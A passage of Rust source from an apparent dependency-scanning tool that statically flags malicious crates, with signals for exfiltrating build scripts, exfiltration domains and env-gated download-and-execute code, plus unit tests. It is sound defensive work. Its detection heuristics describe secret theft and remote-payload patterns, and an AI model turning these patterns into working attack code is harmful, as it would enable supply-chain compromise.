1023        evidence: vec![
1024            Evidence::with_path(
1025                "source",
1026                path,
1027                "runtime source scans the project's `.rs` files (scanned statically, never executed)",
1028            ),
1029            Evidence::new(
1030                "heuristic",
1031                format!("…and {} — matches the faster_log/async_println crypto-stealer pattern", what.join(" and ")),
1032            ),
1033        ],
1034        recommendation:
1035            "A dependency that reads your source files and exfiltrates/handles secrets is almost \
1036             certainly malicious. Do not build it; report it to the registry."
1037                .into(),
1038    }
1039}
1040
1041/// Build a `suspicious_exfil_domain` signal when a crate's runtime source
1042/// hard-codes a domain from a known data-exfiltration class. Unlike
1043/// `suspicious_source_exfil` this does **not** require the crate to read the
1044/// project's `.rs` files — the faster_log stealer harvested keys from *log*
1045/// files and shipped them to a `*.workers.dev` endpoint, which the source-scan
1046/// fingerprint alone would miss.
1047fn exfil_domain_signal(package: &str, domain: &str, path: String) -> RiskSignal {
1048    RiskSignal {
1049        id: "suspicious_exfil_domain".into(),
1050        package: package.to_string(),
1051        severity: Severity::Medium,
1052        weight: 18,
1053        confidence: 0.5,
1054        evidence: vec![Evidence::with_path(
1055            "source",
1056            path,
1057            format!(
1058                "runtime source references `{domain}`, a domain class commonly used for data exfiltration (scanned statically, never executed)"
1059            ),
1060        )],
1061        recommendation:
1062            "Confirm why this dependency contacts that endpoint. Cloudflare Workers, Telegram, \
1063             IP-geolocation and paste/webhook services are common exfiltration channels — the \
1064             faster_log crypto-stealer (Sept 2025) shipped harvested keys to a `*.workers.dev` URL."
1065                .into(),
1066    }
1067}
1068
1069/// Build an `env_gated_payload` signal: a runtime file that reads an environment
1070/// variable, fetches over the network, and spawns a process — the rustdecimal
1071/// (2022) fingerprint, where the malicious `Decimal::new` checked `GITLAB_CI`,
1072/// downloaded a binary, and executed it. Read statically, never run.
1073fn env_gated_payload_signal(package: &str, path: String) -> RiskSignal {
1074    RiskSignal {
1075        id: "env_gated_payload".into(),
1076        package: package.to_string(),
1077        severity: Severity::High,
1078        weight: 24,
1079        confidence: 0.5,
1080        evidence: vec![Evidence::with_path(
1081            "source",
1082            path,
1083            "runtime source reads an environment variable, makes a network request, and spawns a \
1084             process — the env-gated remote-payload pattern (scanned statically, never executed)",
1085        )],
1086        recommendation:
1087            "A dependency that gates a download-and-execute on an environment variable (e.g. a CI \
1088             flag) is the rustdecimal supply-chain pattern. Review this code before building; \
1089             report it if it is not yours."
1090                .into(),
1091    }
1092}
1093
1094/// Build an optional `build_script_suspicious` signal from a build.rs body.
1095pub(crate) fn build_script_intent_signal(
1096    package: &str,
1097    content: &str,
1098    path: String,
1099) -> Option<RiskSignal> {
1100    let net: Vec<&str> = BUILD_RS_NETWORK
1101        .iter()
1102        .copied()
1103        .filter(|m| content.contains(*m))
1104        .collect();
1105    let payload: Vec<&str> = BUILD_RS_PAYLOAD
1106        .iter()
1107        .copied()
1108        .filter(|m| content.contains(*m))
1109        .collect();
1110
1111    if net.is_empty() && payload.is_empty() {
1112        return None;
1113    }
1114
1115    let (severity, weight) = if !net.is_empty() {
1116        (Severity::High, 28)
1117    } else {
1118        (Severity::Medium, 16)
1119    };
1120
1121    let mut evidence = vec![Evidence::with_path(
1122        "source",
1123        path,
1124        "build.rs shows anomalous intent (scanned statically, never executed)",
1125    )];
1126    if !net.is_empty() {
1127        evidence.push(Evidence::new(
1128            "heuristic",
1129            format!("network access in build script: {}", net.join(", ")),
1130        ));
1131    }
1132    if !payload.is_empty() {
1133        evidence.push(Evidence::new(
1134            "heuristic",
1135            format!("embedded payload / dynamic loading: {}", payload.join(", ")),
1136        ));
1137    }
1138
1139    Some(RiskSignal {
1140        id: "build_script_suspicious".into(),
1141        package: package.to_string(),
1142        severity,
1143        weight,
1144        confidence: 0.8,
1145        evidence,
1146        recommendation:
1147            "A build script that reaches the network or unpacks an opaque payload is a known \
1148             malware vector. Manually review build.rs before building this crate."
1149                .into(),
1150    })
1151}
1152
1153/// Ubiquitous, widely-audited platform/ecosystem crates. Their heuristic
1154/// findings (FFI name, build script, unsafe, duplicate versions) are kept for
1155/// transparency but contribute zero weight, so they never dominate the score.
1156/// Advisory matches against these crates are NEVER suppressed.
1157pub const KNOWN_GOOD_CRATES: &[&str] = &[
1158    // Core platform / std-adjacent
1159    "libc",
1160    "windows-sys",
1161    "windows-targets",
1162    "windows_aarch64_gnullvm",
1163    "windows_aarch64_msvc",
1164    "windows_i686_gnu",
1165    "windows_i686_gnullvm",
1166    "windows_i686_msvc",
1167    "windows_x86_64_gnu",
1168    "windows_x86_64_gnullvm",
1169    "windows_x86_64_msvc",
1170    "linux-raw-sys",
1171    "core-foundation-sys",
1172    "errno",
1173    // wasm / web
1174    "js-sys",
1175    "web-sys",
1176    "wasm-bindgen",
1177    "wasm-bindgen-backend",
1178    "wasm-bindgen-shared",
1179    // ubiquitous low-level utilities
1180    "bitflags",
1181    "cfg-if",
1182    "memchr",
1183    "once_cell",
1184    "smallvec",
1185    "rustix",
1186    "getrandom",
1187    // Legit, established crates (>=100k downloads) that sit one edit from a
1188    // popular crate; confirmed non-typosquats from a full crates.io db-dump scan.
1189    "base62",
1190    "bhttp",
1191    "boml",
1192    "byte",
1193    "cfg-iif",
1194    "chttp",
1195    "clamp",
1196    "cmac",
1197    "coap",
1198    "cuid",
1199    "ehttp",
1200    "ghash",
1201    "httm",
1202    "http2",
1203    "hyper2",
1204    "hyperx",
1205    "hypher",
1206    "idea",
1207    "index-map",
1208    "iter_tools",
1209    "lhash",
1210    "lib0",
1211    "libm",
1212    "manyhow",
1213    "mise",
1214    "nbytes",
1215    "nuid",
1216    "objekt",
1217    "ohttp",
1218    "openssh",
1219    "pastel",
1220    "pastey",
1221    "pasts",
1222    "ping",
1223    "pmac",
1224    "rbase64",
1225    "rend",
1226    "rinf",
1227    "rlibc",
1228    "rustis",
1229    "rxing",
1230    "serde_json5",
1231    "serde_yaml2",
1232    "serde_yml",
1233    "sha-1",
1234    "shaq",
1235    "socket",
1236    "str0m",
1237    "tdigest",
1238    "temp-file",
1239    "tide",
1240    "timer",
1241    "tokio-utils",
1242    "tomlq",
1243    "uguid",
1244    "ulid",
1245    "utime",
1246    "uuid7",
1247];
1248
1249/// Whether a crate is on the built-in known-good baseline (case-sensitive,
1250/// matches crate names as they appear in `Cargo.lock`).
1251pub fn is_known_good(name: &str) -> bool {
1252    KNOWN_GOOD_CRATES.contains(&name)
1253}
1254
1255/// Downgrade heuristic (non-advisory) findings for known-good crates to Info /
1256/// zero weight, appending a note. Advisory findings are left untouched.
1257fn apply_known_good_baseline(signals: &mut [RiskSignal]) {
1258    for signal in signals.iter_mut() {
1259        // Advisory matches, yanked status, *suspicious* build scripts, typosquats,
1260        // ownership changes and the malware / dependency-confusion source signals
1261        // are strong evidence, never suppressed by the baseline. Ownership change
1262        // and source substitution in particular MUST survive: the xz and
1263        // event-stream takeovers and dependency-confusion attacks all target
1264        // ubiquitous, "known-good" crates — silencing them there blinds the signal
1265        // to its main target.
1266        if signal.id.starts_with("advisory_")
1267            || signal.id == "yanked_crate"
1268            || signal.id == "build_script_suspicious"
1269            || signal.id == "suspicious_source_exfil"
1270            || signal.id == "suspicious_exfil_domain"
1271            || signal.id == "env_gated_payload"
1272            || signal.id == "possible_typosquat"
1273            || signal.id == "owners_changed"
1274            || signal.id == "source_substitution"
1275            || signal.id == "denied_crate"
1276        {
1277            continue;
1278        }
1279        let name = signal.package.split('@').next().unwrap_or(&signal.package);
1280        if is_known_good(name) {
1281            signal.severity = Severity::Info;
1282            signal.weight = 0;
1283            signal.evidence.push(Evidence::new(
1284                "baseline",
1285                "crate is on the rustinel known-good baseline (ubiquitous platform/ecosystem crate); not counted toward risk",
1286            ));
1287        }
1288    }
1289}
1290
1291/// Read-only source/metadata scanning for crates we can find on disk.
1292fn collect_source_signals(
1293    lock: &LockfileModel,
1294    source_root: &Path,
1295    signals: &mut Vec<RiskSignal>,
1296) -> Result<(), RustinelError> {
1297    for package in lock.registry_packages() {
1298        let Some(crate_dir) = locate_crate_dir(source_root, package) else {
1299            continue;
1300        };
1301
1302        // build.rs detection — file presence only, never executed.
1303        let build_rs = crate_dir.join("build.rs");
1304        if build_rs.is_file() {
1305            signals.push(RiskSignal {
1306                id: "build_script_present".into(),
1307                package: package.id.to_string(),
1308                // Presence of a build script is ubiquitous and informational; the
1309                // *intent* scan (build_script_suspicious) carries the real weight.
1310                severity: Severity::Low,
1311                weight: 2,
1312                confidence: 0.95,
1313                evidence: vec![Evidence::with_path(
1314                    "file",
1315                    rel_display(source_root, &build_rs),
1316                    "build.rs exists; the file was inspected statically and never executed",
1317                )],
1318                recommendation: "Review the build script before merging.".into(),
1319            });
1320
1321            // Static *intent* scan of the build script. A build.rs that reaches
1322            // the network or embeds an opaque payload is highly anomalous and is
1323            // the exact vector used by recent malicious crates — never executed,
1324            // only read.
1325            if let Some(content) =
1326                crate::safety::read_file_capped(&build_rs, crate::safety::MAX_SOURCE_FILE_BYTES)
1327            {
1328                if let Some(sig) = build_script_intent_signal(
1329                    &package.id.to_string(),
1330                    &content,
1331                    rel_display(source_root, &build_rs),
1332                ) {
1333                    signals.push(sig);
1334                }
1335            }
1336        }
1337
1338        // Manifest signals: native `links`, declared license.
1339        let manifest = crate_dir.join("Cargo.toml");
1340        if let Some(meta) = read_manifest(&manifest) {
1341            if let Some(links) = meta.links {
1342                // Manifest-confirmed native linkage is a stronger signal than the
1343                // name heuristic: escalate severity/weight and confidence.
1344                if let Some(existing) = signals
1345                    .iter_mut()
1346                    .find(|s| s.id == "native_ffi_detected" && s.package == package.id.to_string())
1347                {
1348                    existing.severity = Severity::Medium;
1349                    existing.weight = 14;
1350                    existing.confidence = 0.95;
1351                    existing.evidence.push(Evidence::with_path(
1352                        "manifest",
1353                        rel_display(source_root, &manifest),
1354                        format!("manifest declares `links = \"{links}\"`"),
1355                    ));
1356                } else {
1357                    signals.push(RiskSignal {
1358                        id: "native_ffi_detected".into(),
1359                        package: package.id.to_string(),
1360                        severity: Severity::Medium,
1361                        weight: 14,
1362                        confidence: 0.9,
1363                        evidence: vec![Evidence::with_path(
1364                            "manifest",
1365                            rel_display(source_root, &manifest),
1366                            format!("manifest declares `links = \"{links}\"`"),
1367                        )],
1368                        recommendation:
1369                            "Review the native dependency and its build process before merging."
1370                                .into(),
1371                    });
1372                }
1373            }
1374
1375            signals.push(license_signal(
1376                package,
1377                meta.license.as_deref(),
1378                &manifest,
1379                source_root,
1380            ));
1381        }
1382
1383        // unsafe usage — static, comment/string-aware count across src/*.rs.
1384        // `unsafe` is ubiquitous and is NOT a vulnerability by itself, so it
1385        // carries little score weight (cargo-geiger philosophy); it stays visible.
1386        if let Some((stats, sample)) = count_unsafe(&crate_dir) {
1387            if stats.total > 0 {
1388                let (severity, weight) = if stats.total >= 20 {
1389                    (Severity::Low, 3)
1390                } else {
1391                    (Severity::Low, 1)
1392                };
1393                signals.push(RiskSignal {
1394                    id: "unsafe_present".into(),
1395                    package: package.id.to_string(),
1396                    severity,
1397                    weight,
1398                    confidence: 0.8,
1399                    evidence: vec![Evidence::with_path(
1400                        "source",
1401                        rel_display(source_root, &sample),
1402                        format!(
1403                            "{} `unsafe` usage(s) found by static scan (comments and strings ignored). \
1404                             Use of `unsafe` is not automatically a vulnerability; it indicates code that warrants review.",
1405                            stats.breakdown()
1406                        ),
1407                    )],
1408                    recommendation:
1409                        "Confirm that `unsafe` blocks are justified and reviewed. This is informational, not a vulnerability."
1410                            .into(),
1411                });
1412            }
1413        }
1414
1415        // Runtime secret-exfiltration fingerprint (faster_log/async_println class).
1416        // Each signal cites its OWN matching file (scan.*_sample), not one shared
1417        // path — otherwise an env-gated payload in file B could be attributed to
1418        // file A which merely held the exfil domain.
1419        if let Some(scan) = scan_source_exfil(&crate_dir) {
1420            if let Some(s) = &scan.source_exfil_sample {
1421                signals.push(source_exfil_signal(
1422                    &package.id.to_string(),
1423                    scan.source_exfil_network,
1424                    scan.source_exfil_secrets,
1425                    rel_display(source_root, s),
1426                ));
1427            }
1428            // Exfil-domain reputation: fires even when the crate does not read the
1429            // project's `.rs` files (faster_log harvested *log* files).
1430            if let (Some(domain), Some(s)) = (scan.exfil_domain.as_deref(), &scan.domain_sample) {
1431                signals.push(exfil_domain_signal(
1432                    &package.id.to_string(),
1433                    domain,
1434                    rel_display(source_root, s),
1435                ));
1436            }
1437            // Env-gated remote payload (rustdecimal, 2022): env var + network + spawn.
1438            if let Some(s) = &scan.env_gated_sample {
1439                signals.push(env_gated_payload_signal(
1440                    &package.id.to_string(),
1441                    rel_display(source_root, s),
1442                ));
1443            }
1444        }
1445    }
1446    Ok(())
1447}
1448
1449fn license_signal(
1450    package: &Package,
1451    license: Option<&str>,
1452    manifest: &Path,
1453    source_root: &Path,
1454) -> RiskSignal {
1455    match license {
1456        Some(license) => RiskSignal {
1457            id: "license_detected".into(),
1458            package: package.id.to_string(),
1459            severity: Severity::Info,
1460            weight: 0,
1461            confidence: 1.0,
1462            evidence: vec![Evidence::with_path(
1463                "manifest",
1464                rel_display(source_root, manifest),
1465                format!("declared license: {license}"),
1466            )],
1467            recommendation: "Confirm the license is allowed by your organization policy.".into(),
1468        },
1469        None => RiskSignal {
1470            id: "license_unknown".into(),
1471            package: package.id.to_string(),
1472            severity: Severity::Low,
1473            weight: 4,
1474            confidence: 0.9,
1475            evidence: vec![Evidence::with_path(
1476                "manifest",
1477                rel_display(source_root, manifest),
1478                "no `license` or `license-file` field found in the manifest",
1479            )],
1480            recommendation: "Determine the crate's license before depending on it.".into(),
1481        },
1482    }
1483}
1484
1485/// Minimal manifest fields we care about. Parsed read-only.
1486struct ManifestMeta {
1487    links: Option<String>,
1488    license: Option<String>,
1489}
1490
1491fn read_manifest(path: &Path) -> Option<ManifestMeta> {
1492    let content = crate::safety::read_file_capped(path, crate::safety::MAX_SOURCE_FILE_BYTES)?;
1493    let value: toml::Value = toml::from_str(&content).ok()?;
1494    let package = value.get("package")?;
1495    let links = package
1496        .get("links")
1497        .and_then(|v| v.as_str())
1498        .map(|s| s.to_string());
1499    let license = package
1500        .get("license")
1501        .and_then(|v| v.as_str())
1502        .map(|s| s.to_string())
1503        .or_else(|| {
1504            package
1505                .get("license-file")
1506                .and_then(|v| v.as_str())
1507                .map(|f| format!("file:{f}"))
1508        });
1509    Some(ManifestMeta { links, license })
1510}
1511
1512/// Count `unsafe` tokens across the crate's `src` tree. Returns the count plus a
1513/// representative file for evidence.
1514///
1515/// Hardened traversal: symlinks are never followed (so an attacker-planted
1516/// symlink cannot redirect the scan to `/etc/shadow`), recursion depth and
1517/// total entries are bounded, and each file read is size-capped.
1518fn count_unsafe(crate_dir: &Path) -> Option<(UnsafeStats, PathBuf)> {
1519    use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
1520
1521    let mut total = UnsafeStats::default();
1522    let mut sample: Option<PathBuf> = None;
1523    // (dir, depth)
1524    let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
1525        vec![(crate_dir.join("src"), 0)]
1526    } else {
1527        vec![(crate_dir.to_path_buf(), 0)]
1528    };
1529
1530    let mut visited = 0usize;
1531    while let Some((dir, depth)) = stack.pop() {
1532        for entry in sorted_dir_entries(&dir) {
1533            if visited >= MAX_DIR_ENTRIES {
1534                return sample.map(|s| (total, s));
1535            }
1536            visited += 1;
1537            // file_type() from a DirEntry does NOT follow symlinks.
1538            let Ok(ft) = entry.file_type() else { continue };
1539            if ft.is_symlink() {
1540                continue; // never traverse or read through symlinks
1541            }
1542            let path = entry.path();
1543            if ft.is_dir() {
1544                if depth < MAX_DIR_DEPTH {
1545                    stack.push((path, depth + 1));
1546                }
1547                continue;
1548            }
1549            if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
1550                if let Some(content) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES)
1551                {
1552                    let stats = scan_unsafe(&content);
1553                    if stats.total > 0 {
1554                        if sample.is_none() {
1555                            sample = Some(path.clone());
1556                        }
1557                        total.add(&stats);
1558                    }
1559                }
1560            }
1561        }
1562    }
1563    sample.map(|s| (total, s))
1564}
1565
1566/// Breakdown of `unsafe` usage, so the finding can *contextualize* rather than
1567/// just count (a gap noted vs cargo-geiger).
1568#[derive(Debug, Default, Clone, Copy)]
1569pub(crate) struct UnsafeStats {
1570    total: usize,
1571    fns: usize,
1572    impls: usize,
1573    traits: usize,
1574    blocks: usize,
1575}
1576
1577impl UnsafeStats {
1578    fn add(&mut self, o: &UnsafeStats) {
1579        self.total += o.total;
1580        self.fns += o.fns;
1581        self.impls += o.impls;
1582        self.traits += o.traits;
1583        self.blocks += o.blocks;
1584    }
1585
1586    /// "12 (3 fn, 1 impl, 8 block)" style breakdown.
1587    fn breakdown(&self) -> String {
1588        let mut parts = Vec::new();
1589        if self.fns > 0 {
1590            parts.push(format!("{} fn", self.fns));
1591        }
1592        if self.impls > 0 {
1593            parts.push(format!("{} impl", self.impls));
1594        }
1595        if self.traits > 0 {
1596            parts.push(format!("{} trait", self.traits));
1597        }
1598        if self.blocks > 0 {
1599            parts.push(format!("{} block", self.blocks));
1600        }
1601        if parts.is_empty() {
1602            self.total.to_string()
1603        } else {
1604            format!("{} ({})", self.total, parts.join(", "))
1605        }
1606    }
1607}
1608
1609/// Count `unsafe` keywords in real code, ignoring comments and string/raw-string
1610/// literals (so `unsafe` in a doc comment or string is not counted), and
1611/// categorize each by the construct that follows (`fn`/`impl`/`trait`/block).
1612///
1613/// A small hand lexer — deliberately not a full parser, never executes anything,
1614/// and is bounded by the caller's file-size cap. Unrecognized exotic syntax can
1615/// only mis-count slightly; it can never panic.
1616pub(crate) fn scan_unsafe(src: &str) -> UnsafeStats {
1617    let b = src.as_bytes();
1618    let n = b.len();
1619    let mut stats = UnsafeStats::default();
1620    let mut i = 0;
1621
1622    enum State {
1623        Normal,
1624        Line,
1625        Block(usize),
1626        Str,
1627        Raw(usize),
1628    }
1629    let mut st = State::Normal;
1630
1631    while i < n {
1632        match st {
1633            State::Normal => {
1634                if b[i] == b'/' && i + 1 < n && b[i + 1] == b'/' {
1635                    st = State::Line;
1636                    i += 2;
1637                } else if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1638                    st = State::Block(1);
1639                    i += 2;
1640                } else if let Some((hashes, skip)) = raw_string_start(b, i) {
1641                    st = State::Raw(hashes);
1642                    i += skip;
1643                } else if b[i] == b'"' {
1644                    st = State::Str;
1645                    i += 1;
1646                } else if b[i] == b'\'' {
1647                    i += char_literal_len(b, i); // skip char literals (>=1)
1648                } else if b[i] == b'u' && matches_unsafe(b, i) {
1649                    stats.total += 1;
1650                    categorize(b, i + 6, &mut stats);
1651                    i += 6;
1652                } else {
1653                    i += 1;
1654                }
1655            }
1656            State::Line => {
1657                if b[i] == b'\n' {
1658                    st = State::Normal;
1659                }
1660                i += 1;
1661            }
1662            State::Block(d) => {
1663                if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1664                    st = State::Block(d + 1);
1665                    i += 2;
1666                } else if b[i] == b'*' && i + 1 < n && b[i + 1] == b'/' {
1667                    st = if d == 1 {
1668                        State::Normal
1669                    } else {
1670                        State::Block(d - 1)
1671                    };
1672                    i += 2;
1673                } else {
1674                    i += 1;
1675                }
1676            }
1677            State::Str => {
1678                if b[i] == b'\\' {
1679                    i += 2;
1680                } else {
1681                    if b[i] == b'"' {
1682                        st = State::Normal;
1683                    }
1684                    i += 1;
1685                }
1686            }
1687            State::Raw(h) => {
1688                if b[i] == b'"' && i + 1 + h <= n && b[i + 1..i + 1 + h].iter().all(|&c| c == b'#')
1689                {
1690                    st = State::Normal;
1691                    i += 1 + h;
1692                } else {
1693                    i += 1;
1694                }
1695            }
1696        }
1697    }
1698    stats
1699}
1700
1701/// `unsafe` as a whole word at position `i`.
1702fn matches_unsafe(b: &[u8], i: usize) -> bool {
1703    if i + 6 > b.len() || &b[i..i + 6] != b"unsafe" {
1704        return false;
1705    }
1706    let before_ok = i == 0 || !is_ident_byte(b[i - 1]);
1707    let after_ok = i + 6 >= b.len() || !is_ident_byte(b[i + 6]);
1708    before_ok && after_ok
1709}
1710
1711/// Classify the construct after an `unsafe` keyword (whitespace-skipped).
1712fn categorize(b: &[u8], mut j: usize, stats: &mut UnsafeStats) {
1713    while j < b.len() && b[j].is_ascii_whitespace() {
1714        j += 1;
1715    }
1716    let starts = |kw: &[u8]| -> bool {
1717        j + kw.len() <= b.len()
1718            && &b[j..j + kw.len()] == kw
1719            && (j + kw.len() == b.len() || !is_ident_byte(b[j + kw.len()]))
1720    };
1721    if starts(b"fn") {
1722        stats.fns += 1;
1723    } else if starts(b"impl") {
1724        stats.impls += 1;
1725    } else if starts(b"trait") {
1726        stats.traits += 1;
1727    } else {
1728        stats.blocks += 1;
1729    }
1730}
1731
1732/// If a raw-string literal (`r"`, `r#"`, `br##"`, …) starts at `i`, return its
1733/// hash count and the number of bytes to skip to land after the opening quote.
1734fn raw_string_start(b: &[u8], i: usize) -> Option<(usize, usize)> {
1735    // Must be a token start: preceded by a non-identifier byte.
1736    if i > 0 && is_ident_byte(b[i - 1]) {
1737        return None;
1738    }
1739    let mut p = i;
1740    if b.get(p) == Some(&b'b') {
1741        p += 1; // byte raw string
1742    }
1743    if b.get(p) != Some(&b'r') {
1744        return None;
1745    }
1746    p += 1;
1747    let hash_start = p;
1748    while b.get(p) == Some(&b'#') {
1749        p += 1;
1750    }
1751    if b.get(p) == Some(&b'"') {
1752        let hashes = p - hash_start;
1753        Some((hashes, p - i + 1)) // skip through the opening quote
1754    } else {
1755        None
1756    }
1757}
1758
1759/// Byte length of a char literal starting at `i` (`'a'`, `'\n'`, `'\u{1F}'`),
1760/// or 1 if it's actually a lifetime (`'a`) / not a literal — so the caller
1761/// always advances.
1762fn char_literal_len(b: &[u8], i: usize) -> usize {
1763    // b[i] == '\''
1764    if b.get(i + 1) == Some(&b'\\') {
1765        // escaped: find the closing quote within a bounded window
1766        let mut p = i + 2;
1767        let end = (i + 12).min(b.len());
1768        while p < end {
1769            if b[p] == b'\'' {
1770                return p - i + 1;
1771            }
1772            p += 1;
1773        }
1774        1
1775    } else if b.get(i + 2) == Some(&b'\'') && b.get(i + 1) != Some(&b'\'') {
1776        3 // simple 'X'
1777    } else {
1778        1 // lifetime or unknown
1779    }
1780}
1781
1782fn is_ident_byte(b: u8) -> bool {
1783    b.is_ascii_alphanumeric() || b == b'_'
1784}
1785
1786/// Find a crate's on-disk directory under a source root, supporting both the
1787/// flat fixture layout (`<root>/<name>-<version>`) and the real Cargo registry
1788/// src layout (`<root>/<registry>/<name>-<version>`).
1789///
1790/// Hardened against path traversal: the crate name and version come from an
1791/// untrusted lockfile, so they are validated to be safe single path segments
1792/// (no `/`, `\`, `..`, NUL) and the resolved directory is verified to be
1793/// canonically contained within `source_root`.
1794fn locate_crate_dir(source_root: &Path, package: &Package) -> Option<PathBuf> {
1795    use crate::safety::{
1796        is_contained_within, is_safe_crate_name, is_safe_path_segment, is_safe_version,
1797    };
1798
1799    if !is_safe_crate_name(&package.id.name) || !is_safe_version(&package.id.version) {
1800        return None;
1801    }
1802    let dir_name = format!("{}-{}", package.id.name, package.id.version);
1803    if !is_safe_path_segment(&dir_name) {
1804        return None;
1805    }
1806
1807    let verify = |candidate: PathBuf| -> Option<PathBuf> {
1808        // Must be a real directory (not a symlink) AND inside source_root.
1809        let meta = std::fs::symlink_metadata(&candidate).ok()?;
1810        if !meta.file_type().is_dir() {
1811            return None;
1812        }
1813        if is_contained_within(source_root, &candidate) {
1814            Some(candidate)
1815        } else {
1816            None
1817        }
1818    };
1819
1820    if let Some(dir) = verify(source_root.join(&dir_name)) {
1821        return Some(dir);
1822    }
1823    // One level of nesting (e.g. registry index hash dir). Sorted so that, if the
1824    // same `name-version` dir exists under more than one nesting parent (e.g. two
1825    // registry index hashes), the chosen crate dir — and thus every evidence path
1826    // derived from it — is reproducible across filesystems.
1827    for entry in sorted_dir_entries(source_root) {
1828        let Ok(ft) = entry.file_type() else { continue };
1829        if !ft.is_dir() {
1830            continue; // skip symlinks and files
1831        }
1832        if let Some(dir) = verify(entry.path().join(&dir_name)) {
1833            return Some(dir);
1834        }
1835    }
1836    None
1837}
1838
1839fn rel_display(root: &Path, path: &Path) -> String {
1840    path.strip_prefix(root)
1841        .unwrap_or(path)
1842        .display()
1843        .to_string()
1844}
1845
1846#[cfg(test)]
1847mod tests {
1848    use super::*;
1849    use crate::lockfile::PackageId;
1850
1851    fn pkg(name: &str, version: &str, local: bool) -> Package {
1852        Package {
1853            id: PackageId {
1854                name: name.into(),
1855                version: version.into(),
1856                source: if local {
1857                    None
1858                } else {
1859                    Some("registry+https://github.com/rust-lang/crates.io-index".into())
1860                },
1861            },
1862            checksum: None,
1863            dependencies: vec![],
1864        }
1865    }
1866
1867    fn lock(packages: Vec<Package>) -> LockfileModel {
1868        LockfileModel {
1869            path: PathBuf::from("Cargo.lock"),
1870            version: Some(3),
1871            packages,
1872        }
1873    }
1874
1875    fn opts_with_meta(pairs: &[(&str, crate::CrateMetadata)]) -> AnalysisOptions {
1876        let mut metadata = std::collections::BTreeMap::new();
1877        for (k, m) in pairs {
1878            metadata.insert((*k).to_string(), m.clone());
1879        }
1880        AnalysisOptions {
1881            metadata,
1882            ..Default::default()
1883        }
1884    }
1885
1886    #[test]
1887    fn typosquat_cleared_by_high_downloads() {
1888        // `miow` is one edit from `mio` but is a legitimate, widely-used crate
1889        // (53M downloads). High adoption must suppress the typosquat flag.
1890        let lk = lock(vec![pkg("miow", "0.6.1", false)]);
1891        let opts = opts_with_meta(&[(
1892            "miow@0.6.1",
1893            crate::CrateMetadata {
1894                total_downloads: Some(53_000_000),
1895                ..Default::default()
1896            },
1897        )]);
1898        let mut sig = vec![];
1899        collect_typosquat(&lk, &opts, &mut sig);
1900        assert!(
1901            sig.iter().all(|s| s.id != "possible_typosquat"),
1902            "established crate must not be flagged as a typosquat"
1903        );
1904    }
1905
1906    #[test]
1907    fn typosquat_flagged_when_obscure() {
1908        // A name one edit from `mio` with almost no downloads IS a suspect.
1909        let lk = lock(vec![pkg("miow", "0.0.1", false)]);
1910        let opts = opts_with_meta(&[(
1911            "miow@0.0.1",
1912            crate::CrateMetadata {
1913                total_downloads: Some(42),
1914                ..Default::default()
1915            },
1916        )]);
1917        let mut sig = vec![];
1918        collect_typosquat(&lk, &opts, &mut sig);
1919        let f = sig
1920            .iter()
1921            .find(|s| s.id == "possible_typosquat")
1922            .expect("obscure look-alike must be flagged");
1923        assert_eq!(f.severity, Severity::Medium);
1924    }
1925
1926    #[test]
1927    fn typosquat_offline_is_quiet_info() {
1928        // Without metadata we cannot corroborate, so emit a quiet Info hint, never
1929        // a misleading Medium finding (the `miow` false-positive regression).
1930        let lk = lock(vec![pkg("miow", "0.6.1", false)]);
1931        let opts = AnalysisOptions::default();
1932        let mut sig = vec![];
1933        collect_typosquat(&lk, &opts, &mut sig);
1934        let f = sig
1935            .iter()
1936            .find(|s| s.id == "possible_typosquat")
1937            .expect("offline hint present");
1938        assert_eq!(f.severity, Severity::Info);
1939    }
1940
1941    #[test]
1942    fn freshness_flags_only_recent_versions() {
1943        let lk = lock(vec![pkg("somecrate", "1.0.0", false)]);
1944        let fresh = opts_with_meta(&[(
1945            "somecrate@1.0.0",
1946            crate::CrateMetadata {
1947                published_days_ago: Some(3),
1948                ..Default::default()
1949            },
1950        )]);
1951        let mut sig = vec![];
1952        collect_freshness(&lk, &fresh, &mut sig);
1953        assert_eq!(
1954            sig.iter().filter(|s| s.id == "freshly_published").count(),
1955            1,
1956            "a 3-day-old version must be flagged fresh"
1957        );
1958
1959        let old = opts_with_meta(&[(
1960            "somecrate@1.0.0",
1961            crate::CrateMetadata {
1962                published_days_ago: Some(400),
1963                ..Default::default()
1964            },
1965        )]);
1966        let mut sig2 = vec![];
1967        collect_freshness(&lk, &old, &mut sig2);
1968        assert!(sig2.is_empty(), "an old version must not be flagged fresh");
1969    }
1970
1971    fn opts_with_owners(meta: &[(&str, &[&str])], trusted: &[(&str, &[&str])]) -> AnalysisOptions {
1972        let mut metadata = std::collections::BTreeMap::new();
1973        for (k, owners) in meta {
1974            metadata.insert(
1975                (*k).to_string(),
1976                crate::CrateMetadata {
1977                    owners: owners.iter().map(|s| s.to_string()).collect(),
1978                    ..Default::default()
1979                },
1980            );
1981        }
1982        let mut trusted_owners = std::collections::BTreeMap::new();
1983        for (k, owners) in trusted {
1984            trusted_owners.insert(
1985                (*k).to_string(),
1986                owners.iter().map(|s| s.to_string()).collect(),
1987            );
1988        }
1989        AnalysisOptions {
1990            metadata,
1991            trusted_owners,
1992            ..Default::default()
1993        }
1994    }
1995
1996    #[test]
1997    fn owners_changed_flags_new_maintainer() {
1998        // The xz scenario: trusted owner set was [Lasse]; it is now [Lasse, JiaT75]
1999        // — a new maintainer appeared. That must be flagged.
2000        let lk = lock(vec![pkg("xz2", "0.1.7", false)]);
2001        let opts = opts_with_owners(
2002            &[("xz2@0.1.7", &["Lasse", "JiaT75"])],
2003            &[("xz2", &["Lasse"])],
2004        );
2005        let mut sig = vec![];
2006        collect_owners_changed(&lk, &opts, &mut sig);
2007        let f = sig
2008            .iter()
2009            .find(|s| s.id == "owners_changed")
2010            .expect("a new maintainer must be flagged");
2011        assert_eq!(f.severity, Severity::Medium);
2012        assert!(f.evidence[0].summary.contains("JiaT75"));
2013    }
2014
2015    #[test]
2016    fn owners_unchanged_emits_nothing() {
2017        let lk = lock(vec![pkg("serde", "1.0.0", false)]);
2018        let opts = opts_with_owners(&[("serde@1.0.0", &["dtolnay"])], &[("serde", &["dtolnay"])]);
2019        let mut sig = vec![];
2020        collect_owners_changed(&lk, &opts, &mut sig);
